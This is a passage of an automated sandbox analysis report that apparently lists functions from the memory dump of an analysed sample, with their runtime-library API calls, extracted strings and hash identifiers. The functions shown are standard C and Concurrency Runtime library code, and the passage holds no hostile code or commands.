Instruction Fuzzy Hash: C821BBB6900118EFCB11EF94C880DDD7BBABF08354F014565AA299B565DB31DA44DF84

Function 0043A559 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A56F

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043A57B
_free.LIBCMT ref: 0043A586
_free.LIBCMT ref: 0043A591
_free.LIBCMT ref: 0043A59C
_free.LIBCMT ref: 0043A5A7
_free.LIBCMT ref: 0043A5B2
_free.LIBCMT ref: 0043A5BD
_free.LIBCMT ref: 0043A5C8
_free.LIBCMT ref: 0043A5D6

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: d5756e4be776d265c631e914caca5967b4e144ec79bf9f4ded6797d03f0bc009
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction Fuzzy Hash: C021E776940108FFCB01EFA9C881CDE7BBABF08345F0051AAF5459B521EB35EA94CB85

Function 00445A82 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 00445A9B

Strings

log, xrefs: 00445AF8, 00445B07
sqrt, xrefs: 00445BDA
acos, xrefs: 00445BD1
log10, xrefs: 00445ADD, 00445AEC
asin, xrefs: 00445BC8
pow, xrefs: 00445B39, 00445BE3, 00445C30
exp, xrefs: 00445B1A, 00445B7F

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 7e11b681a690fd98a2b640cdef5f2481af1cc968e8b139b6733d987c9b93043a
Instruction ID: 8f21642526c0a384525b0a78e457c39df1912065d7a9ddf966662cad22d26739
Opcode Fuzzy Hash: 7e11b681a690fd98a2b640cdef5f2481af1cc968e8b139b6733d987c9b93043a
Instruction Fuzzy Hash: EE517E74904E4ADBEF109F58E88C5AE7F74FB05310F148157D880AA356CB789A2ACF1D

Function 00427364 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273B0
SwitchToThread.KERNEL32(?), ref: 004273D3
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427440

Strings

count, xrefs: 0042737E
ppVirtualProcessorRoots, xrefs: 00427438

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction ID: 910b0151320ec7fd7557316ad521234f334c06ab70371bbe18cdfb5d61862d5e
Opcode Fuzzy Hash: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction Fuzzy Hash: A8219334B00229EFCB10EF55D485AAEBBB5BF09344F54406AEC0197351CB38AE05CB98

Function 00426E1C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00426E36
GetCurrentProcess.KERNEL32 ref: 00426E3E
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00426E53
SafeRWList.LIBCONCRT ref: 00426E73

Part of subcall function 00424E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424E7F
Part of subcall function 00424E6E: List.LIBCMT ref: 00424E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426E85
GetLastError.KERNEL32 ref: 00426E94
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426EAA

Strings

eventObject, xrefs: 00426E7D

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: b62cbed1bd16eb0b2b2c40c5403938e97f3cad696c6ba2539ab88a788b3ccb2b
Instruction ID: 2eb99b2fab9b0e49766b11680856393b7410886275509e22dbc04e0cf8104fc6
Opcode Fuzzy Hash: b62cbed1bd16eb0b2b2c40c5403938e97f3cad696c6ba2539ab88a788b3ccb2b
Instruction Fuzzy Hash: 5D11E379600214EBDB14EBA4EC8AFEE3768AF04306F61416AF505A61D2DB389A04C66D

Function 02365939 Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction ID: 406733523a18d8a2485506683acd54fd3311e575853b6c2b2ea96b8f1baed0b2
Opcode Fuzzy Hash: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction Fuzzy Hash: 70C116B0E042099FDB21CF98D888BBDBBBABF49314F408078E915AB395D7749941CF61

Function 004456D2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction ID: ee9b374b754267b3a96934832a8bfcd590faa4b6eb17edeb4b1fb680e658e9fc
Opcode Fuzzy Hash: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction Fuzzy Hash: A3C114B0A04649EFEF15DF99C880BAEBBB1AF49314F00416BE441A7393D7789901CF69

Function 0233C6B9 Relevance: 13.6, APIs: 9, Instructions: 138threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0233C6E1
GetCurrentThreadId.KERNEL32 ref: 0233C6FE
GetCurrentThreadId.KERNEL32 ref: 0233C713
_xtime_get.LIBCPMT ref: 0233C75F
GetCurrentThreadId.KERNEL32 ref: 0233C791
__Xtime_diff_to_millis2.LIBCPMT ref: 0233C7A9
_xtime_get.LIBCPMT ref: 0233C7C8
GetCurrentThreadId.KERNEL32 ref: 0233C7D2
GetCurrentThreadId.KERNEL32 ref: 0233C829

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction ID: ff75c7803a3e84e02df9ed05ef817a45caf8c8254b5fe4bb336faa427ff7d119
Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction Fuzzy Hash: 83516F34900215DFCF22DF64C9849ADB7B5FF08315B1469AAD806AB552DB30EF81CF95

Function 02347B48 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 02347B6A

Part of subcall function 02345F1F: __EH_prolog3_catch.LIBCMT ref: 02345F26
Part of subcall function 02345F1F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02345F5F

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 02347B78

Part of subcall function 02346B84: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 02346BA9
Part of subcall function 02346B84: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 02346BCC

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02347B91
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 02347B9D

Part of subcall function 02345F1F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02345FA8
Part of subcall function 02345F1F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 02345FD7
Part of subcall function 02345F1F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 02345FE5

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 02347BE9
Concurrency::location::_Assign.LIBCMT ref: 02347C0A
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 02347C12
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02347C24
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 02347C54

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 6e6778632e0c876e99d07d7c69cb2859a83370f8f29c902fd606fc16623da626
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 6131E330B00255ABDF25AA7844857FEF7EA9F41344F0404E9C845E7241DF257A458BE1

Function 004278E1 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427903

Part of subcall function 00425CB8: __EH_prolog3_catch.LIBCMT ref: 00425CBF
Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425CF8

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00427911

Part of subcall function 0042691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426942
Part of subcall function 0042691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426965

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0042792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427936

Part of subcall function 00425CB8: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00425D41
Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425D70
Part of subcall function 00425CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427982
Concurrency::location::_Assign.LIBCMT ref: 004279A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004279AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004279BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004279ED

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: be26d28973ab40e19276e1e39a9ed43843e9869f42fe47dc141d3d43563d5587
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 9F314670B083715AEF16AA7854927FF77B59F01304F4401ABD485D7342DA2C4D8AC3D9

Function 02350BEC Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02350C02
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,02345F15,?), ref: 02350C14
GetCurrentThread.KERNEL32 ref: 02350C1C
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,02345F15,?), ref: 02350C24
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,02345F15,?), ref: 02350C3D
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 02350C5E

Part of subcall function 02340478: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02340492

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,02345F15,?), ref: 02350C70
GetLastError.KERNEL32(?,?,?,?,?,02345F15,?), ref: 02350C9B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02350CB1

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction ID: 9a8399b42236e8fc277feaf9f014ebe8f84caea0105e70e872fa39cc7974582f
Opcode Fuzzy Hash: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction Fuzzy Hash: F4110679600311ABD724AB749D49F9E3BACAF0A701F080075FD8AEA152EB75D4048B75

Function 00430985 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043099B
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425CAE,?), ref: 004309AD
GetCurrentThread.KERNEL32 ref: 004309B5
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425CAE,?), ref: 004309BD
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425CAE,?), ref: 004309D6
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 004309F7

Part of subcall function 00420211: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042022B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425CAE,?), ref: 00430A09
GetLastError.KERNEL32(?,?,?,?,?,00425CAE,?), ref: 00430A34
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00430A4A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction ID: 58a410a88ddb3f2405c1133c244b860286e3bd8ce2c4f5659541a2373579a810
Opcode Fuzzy Hash: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
Instruction Fuzzy Hash: 07112779600301ABD700AFB1BD5AF9B3BA89F19701F14017AF945D6253EA78D800873A

Function 0236277E Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02362800
_free.LIBCMT ref: 02362824
_free.LIBCMT ref: 023629B1
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 023629C3
_free.LIBCMT ref: 02362B7D

Strings

XgE, xrefs: 02362AE0
XgE, xrefs: 0236296C, 02362972

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE$XgE
API String ID: 597776487-1765908331
Opcode ID: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
Instruction ID: 1f5bfe7cfc901776899fdbaf84e34f5139efeee05e2792be62633e6ae34d1e97
Opcode Fuzzy Hash: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
Instruction Fuzzy Hash: ADC12671A00215ABDB349F68CC48BBF7BFEEF45314F1680A9DC8497299EB718A45CB50

Function 02325E77 Relevance: 12.4, APIs: 8, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
Instruction ID: 2dfe26db614bbacc23fb088ff136b40943241da294e9269f650c81e61de05e49
Opcode Fuzzy Hash: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
Instruction Fuzzy Hash: E7F1C17090025CABEB24DF54CC85BDEBBBAEF44704F5042A9E509A72C1DB749A88CF95

Function 00434840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00434877
___except_validate_context_record.LIBVCRUNTIME ref: 0043487F
_ValidateLocalCookies.LIBCMT ref: 00434908
__IsNonwritableInCurrentImage.LIBCMT ref: 00434933
_ValidateLocalCookies.LIBCMT ref: 00434988

Strings

csm, xrefs: 0043491D
S9C, xrefs: 00434925, 0043492E, 0043493F

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: S9C$csm
API String ID: 1170836740-582408667
Opcode ID: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction ID: 6575625a84691e9b1f9b7e8611f910fc559112cced3487189da3a48804891882
Opcode Fuzzy Hash: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction Fuzzy Hash: 7141E874A00208ABCF10DF69C844ADF7BB4BF89318F14815BE8149B392D779EA11CF99

Function 0043B17D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0043B1D4
G"@, xrefs: 0043B217, 0043B20D
ext-ms-, xrefs: 0043B1E8

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: G"@$api-ms-$ext-ms-
API String ID: 0-3963426706
Opcode ID: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction ID: bce6c0f499f03009e687f81e13829494c96e42a1ade786342b8d5ba6f6eadec1
Opcode Fuzzy Hash: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction Fuzzy Hash: 82210875A41714ABCB214B65AC4CB2F3758DB097A0F2027A3FE55A7391D738ED0086ED

Function 0041EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0041EF31

Strings

iA, xrefs: 0041EED0

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: iA
API String ID: 1182035702-1118743441
Opcode ID: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
Instruction ID: dbfce4fa691d0a98bc3aa8749e6742a9d80362ff2df78e67c0c5db40cb0b6eee
Opcode Fuzzy Hash: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
Instruction Fuzzy Hash: 1321F374C002099ADF24DFA6C4456EEB7F0FF14324F10052FE851A22C1E7B84AC6CB48

Function 004467A9 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,2y,00446A65,?,?,?,?,?,?,?,?,2y), ref: 0044684C
__alloca_probe_16.LIBCMT ref: 00446902
__alloca_probe_16.LIBCMT ref: 00446998
__freea.LIBCMT ref: 00446A03
__freea.LIBCMT ref: 00446A0F

Strings

2y, xrefs: 004467AB

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID: 2y
API String ID: 2330168043-546834805
Opcode ID: c93d5030befdd3412ed34437d1360547b5edfd3f1e8b3b9334df1f5af1b906f8
Instruction ID: 261b0646ef3bb21783759df69fc444e01875a83395626589d87ed72ffed4e1ba
Opcode Fuzzy Hash: c93d5030befdd3412ed34437d1360547b5edfd3f1e8b3b9334df1f5af1b906f8
Instruction Fuzzy Hash: 4481C172D006459BEF20AF658881AEF7BB5DF0B354F1A405BE904B7341E739CC458BAA

Function 00436FB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436EE6), ref: 00436FD6
GetFileInformationByHandle.KERNEL32(?,?), ref: 00437030
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00436EE6,?,000000FF,00000000,00000000), ref: 004370BE
__dosmaperr.LIBCMT ref: 004370C5
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00437102

Part of subcall function 0043732A: __dosmaperr.LIBCMT ref: 0043735F

Strings

nC, xrefs: 00436FCE

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: nC
API String ID: 1206951868-4036674207
Opcode ID: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
Instruction ID: 47e44e870bed0e4f5047e2c803f8af1af40435cbdbdaacedd5eb414e92fa1372
Opcode Fuzzy Hash: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
Instruction Fuzzy Hash: 25415EB6904604ABCF389FB6DC459ABBBF9EF48300F10542EF996D3211E638D940CB25

Function 00431B29 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431B42

